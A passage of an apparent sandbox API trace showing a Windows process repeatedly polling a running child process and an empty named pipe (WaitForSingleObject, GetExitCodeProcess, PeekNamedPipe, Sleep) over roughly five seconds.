lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0282.118] Sleep (dwMilliseconds=0x64) [0282.245] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0282.246] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0282.246] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0282.247] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0282.247] Sleep (dwMilliseconds=0x64) [0282.554] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0282.554] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0282.554] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0282.554] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0282.554] Sleep (dwMilliseconds=0x64) [0282.663] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0282.663] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0282.663] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0282.663] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0282.663] Sleep (dwMilliseconds=0x64) [0283.229] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0283.229] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0283.229] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0283.230] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0283.230] Sleep (dwMilliseconds=0x64) [0283.459] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0283.459] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0283.459] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0283.459] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0283.459] Sleep (dwMilliseconds=0x64) [0283.599] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0283.599] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0283.599] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0283.600] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0283.600] Sleep (dwMilliseconds=0x64) [0283.737] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0283.737] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0283.737] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0283.738] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0283.738] Sleep (dwMilliseconds=0x64) [0283.835] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0283.835] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0283.835] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0283.835] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0283.835] Sleep (dwMilliseconds=0x64) [0283.974] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0283.974] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0283.974] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0283.974] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0283.974] Sleep (dwMilliseconds=0x64) [0284.691] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0284.692] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0284.692] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0284.692] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0284.692] Sleep (dwMilliseconds=0x64) [0284.878] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0285.101] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0285.101] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0285.101] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0285.101] Sleep (dwMilliseconds=0x64) [0285.207] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0285.207] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0285.207] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0285.207] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0285.207] Sleep (dwMilliseconds=0x64) [0285.315] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0285.315] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0285.315] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0285.315] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0285.315] Sleep (dwMilliseconds=0x64) [0285.425] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0285.425] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0285.425] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0285.425] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0285.426] Sleep (dwMilliseconds=0x64) [0285.534] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0285.534] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0285.534] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0285.534] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0285.534] Sleep (dwMilliseconds=0x64) [0285.643] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0285.643] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0285.643] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0285.643] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0285.643] Sleep (dwMilliseconds=0x64) [0285.752] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0285.752] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0285.753] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0285.753] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0285.753] Sleep (dwMilliseconds=0x64) [0285.861] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0285.861] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0285.861] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0285.861] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0285.861] Sleep (dwMilliseconds=0x64) [0285.971] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0285.971] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0285.971] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0285.971] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0285.971] Sleep (dwMilliseconds=0x64) [0286.081] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0286.081] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0286.081] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0286.082] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0286.082] Sleep (dwMilliseconds=0x64) [0286.282] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0286.283] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0286.283] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0286.283] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0286.283] Sleep (dwMilliseconds=0x64) [0286.517] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0286.517] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0286.517] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0286.518] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0286.518] Sleep (dwMilliseconds=0x64) [0286.626] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0286.626] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0286.626] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0286.627] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0286.627] Sleep (dwMilliseconds=0x64) [0286.735] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0286.735] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0286.735] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0286.735] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0286.735] Sleep (dwMilliseconds=0x64) [0287.001] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0287.001] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0287.002] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0287.002] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0287.002] Sleep (dwMilliseconds=0x64) [0287.125] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0287.125] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0287.125] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0287.125] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0287.125] Sleep (dwMilliseconds=0x64) [0287.235] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0287.235] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0287.235] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0287.235] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0287.235] Sleep (dwMilliseconds=0x64) [0287.344] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0287.344] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0287.344] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0287.344] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0287.344] Sleep (dwMilliseconds=0x64) [0287.483] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0287.483] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0287.484] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0287.484] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0287.484] Sleep (dwMilliseconds=0x64) [0287.593] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0287.593] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0287.593] PeekNamedPipe (in: hNamedPipe=0x1c, 